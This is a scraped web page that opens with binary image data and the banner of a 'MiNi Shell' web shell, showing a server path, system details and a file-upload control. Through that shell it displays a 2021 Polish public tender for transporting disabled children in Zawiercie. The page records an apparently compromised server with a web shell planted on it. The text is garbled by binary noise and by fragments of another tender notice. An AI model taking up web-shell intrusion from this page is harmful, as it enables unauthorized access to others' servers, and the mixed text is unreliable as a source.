JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210728/0013014301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00130143 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z Gminy Zawiercie do przedszkoli, szkół i ośrodków szkolno-wychowawczych w roku szkolnym 2021/2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZESPÓŁ OBSŁUGI EKONOMICZNO-ADMINISTRACYJNEJ SZKÓŁ W ZAWIERCIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271501887</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ignacego Paderewskiego 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">326722903</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzoeas@mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z Gminy Zawiercie do przedszkoli, szkół i ośrodków szkolno-wychowawczych w roku szkolnym 2021/2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e330275-efcc-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00130143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mzoeas.zawiercie.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzoeas-zawiercie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) - zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://mzoeas-zawiercie.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin<br/>korzystania z<br/>Platformy przetargowej dostępny pod adresem:<br/>https://mzoeas-zawiercie.logintrade.net/rejestracja/regulamin.html. 2. Złożenie ofertypoprzez Platformę<br/>przetargową oznacza akceptację regulaminu, o którym mowa w ust. 1 rozdziału SWZ.3.Wymagania<br/>techniczne związane z korzystaniem z Platformy przetargowej -wskazane są na stronie internetowej<br/>Platformy przetargowej - pod adresem:https://mzoeaszawiercie.<br/>logintrade.net/rejestracja/instrukcje.html4.Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade<br/>SA ul. Legnicka57D,lokal B/J,54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net<br/>odponiedziałku do piątku (dni robocze) w godz. 800 - 1600.5. Sposoby złożenia oferty za<br/>pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru<br/>opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników Platformy<br/>przetargowej.6.Oferty,oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki<br/>dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118ust. 3 ustawy, zwane dalej „zobowiązaniem<br/>podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe,pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art.<br/>18ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne (Dz.U. z2020 r. poz. 346, 568, 695, 1517 i2320), z zastrzeżeniem formatów, o których mowa<br/>w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Pozostałe wymagania<br/>zgodnie z SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że: administratorem Pani/Pana danych<br/>osobowych jest: Prezydent Miasta Zawiercie - Łukasz Konarski, ul. Leśna 2, 42-400 Zawiercie,<br/>Administrator wyznaczył Inspektora Ochrony Danych - Pana - Michała Furgacz, z którym może się<br/>Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób:<br/>e-mail: iod@zawiercie.eu, Tel. 32 494 12 00, Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego: „Przebudowa nawierzchni ulicy Malinowej w Zawierciu” nr postępowania<br/>WIZP.271.41.2021. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z<br/>dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn.zm.), dalej<br/>„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie<br/>przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów<br/>zakładowych, chyba że przepisy szczególne stanowią inaczej; obowiązek podania przez Panią/Pana<br/>Ogłoszenie nr 2021/BZP 00076656/01 z dnia 2021-06-09<br/>2021-06-09 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; posiada Pani/Pan^ na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących^ na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych(1);^ na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych (2);^ prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; nie przysługuje Pani/Panu^ w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych^ prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20 RODO;^ na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.(2) wyjaśnienie: zgodnie z art. 19<br/>ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">138/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a) Dowożenie z miejsca zamieszkania do Szkoły Podstawowej Nr 1 w Łazach ul. Szkolna 2 oraz powrót. <br/>Rodzaj niepełnosprawności: niepełnosprawność ruchowa z afazją<br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/>1 dziecko (trasa o długości około 20 km/dzień)<br/><br/> b) Dowożenie z miejsca zamieszkania do Specjalnego Ośrodka Szkolno – Wychowawczego dla Dzieci i Młodzieży Niepełnosprawnej w Dąbrowie Górniczej ul. Swobodna 59 oraz powrót. <br/>Rodzaj niepełnosprawności: niepełnosprawnością intelektualną w stopniu umiarkowanym, znacznym i głębokim oraz niepełnosprawnościami sprzężonymi (autyzm, słabowidzący, niewidomi, słabosłyszący, niesłyszący, z niepełnosprawnością ruchową) <br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/>9 dzieci w tym 2 na wózku (trasa o długości około 70 km/dzień) <br/> <br/>c) Dowożenie z miejsca zamieszkania do Specjalnego Ośrodka Szkolno – Wychowawczego w Będzinie ul. 11 Listopada 7 (internat)<br/>Rodzaj niepełnosprawności: niepełnosprawność intelektualna w stopniu lekkim<br/>Dowożenie na godz. 8:00 (poniedziałek), odwożenie o godz. 15:00 (piątek)<br/>1 dziecko (trasa o długości około 80 km/dzień) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a) Dowożenie z miejsca zamieszkania do Szkoły Podstawowej Nr 4 w Zawierciu ul. Powstańców Śląskich 18 oraz powrót. <br/>Rodzaj niepełnosprawności: z niepełnosprawnością ruchową w tym afazja<br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/>1 dziecko (trasa o długości około 6 km/dzień) <br/><br/><br/>b) Dowożenie z miejsca zamieszkania do Zespół Szkół im. H. Kołątaja w Zawierciu ul. Miodowa 1 oraz powrót. <br/>Rodzaj niepełnosprawności: niepełnosprawnością ruchową z afazją<br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/><br/>1 dziecko (trasa o długości około 20 km/dzień) <br/><br/> c) Dowożenie z miejsca zamieszkania do Szkoły Podstawowej Nr 14 (Fundacja Elementarz) w Zawierciu ul. Harcerska 67 oraz powrót. <br/>Rodzaj niepełnosprawności :autyzm z zespołem Aspergera<br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/><br/>1 dziecko (trasa o długości około 20 km/dzień) <br/><br/>d) Dowożenie z miejsca zamieszkania do Stowarzyszenia Przyjaciół Szkół Katolickich im, Jana Pawła II w Zawierciu ul. Sienkiewicza 60 oraz powrót. <br/>Rodzaj niepełnosprawności: autyzm, autyzm z zespołem Aspergera <br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/>2 dzieci (trasa o długości około 15 km/dzień) <br/><br/>e) Dowożenie z miejsca zamieszkania do Przedszkola Integracyjnego Nr 3 w Zawierciu ul. Ks. Kard. Wyszyńskiego 5A oraz powrót. <br/>Rodzaj niepełnosprawności: autyzm z zespołem Aspergera <br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/><br/>1 dziecko (trasa o długości około 11 km/dzień) <br/><br/>f). Dowożenie z miejsca zamieszkania do Przedszkola Nr 7 w Zawierciu ul. Sienkiewicza 60 oraz powrót. <br/>Rodzaj niepełnosprawności: niepełnosprawnością intelektualną w stopniu umiarkowanym oraz niepełnosprawnościami sprzężonymi (autyzm, afazja z niepełnosprawnością ruchową) <br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/><br/>5 dzieci (trasa o długości około 20 km/dzień) <br/><br/>g) Dowożenie z miejsca zamieszkania do Przedszkola Nr 15 w Zawierciu ul. Wierzbowa 27 oraz powrót. <br/>Rodzaj niepełnosprawności: afazja z niepełnosprawnością ruchową<br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 (codziennie)<br/><br/>1 dziecko (trasa o długości około 6 km/dzień) <br/><br/>h) Dowożenie z miejsca zamieszkania do Szkoły Podstawowej Nr 11 w Zawierciu ul. Zarzecze 2 oraz powrót. <br/>Rodzaj niepełnosprawności: autyzm z zespołem Aspergera <br/>Dowożenie na godz. 8:00, odwożenie o godz. 15:00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Zdolności do występowania w obrocie gospodarczym: <br/>	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/> <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie; <br/><br/>3)	Sytuacji ekonomicznej lub finansowej:<br/>	Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/><br/>4)	Zdolności technicznej lub zawodowej:<br/>a)	Wykonawca musi wykazać, iż w okresie ostatnich 5 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/><br/>	Co najmniej jedną usługę transportową w zakresie dowozu dzieci niepełnosprawnych za kwotę minimum 30 000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.2. W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań<br/>równoważnych, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz<br/>Ogłoszenie nr 2021/BZP 00076656/01 z dnia 2021-06-09<br/>2021-06-09 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania<br/>równoważne spełniają wymagania Zamawiającego opisane w przedmiocie<br/>zamówienia.JeżeliWykonawca nie złoży ww. dokumentów lub złożone dokumenty będą<br/>niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w<br/>opisie przedmiotu zamówienia, Zamawiający nie będzie wzywał do ich 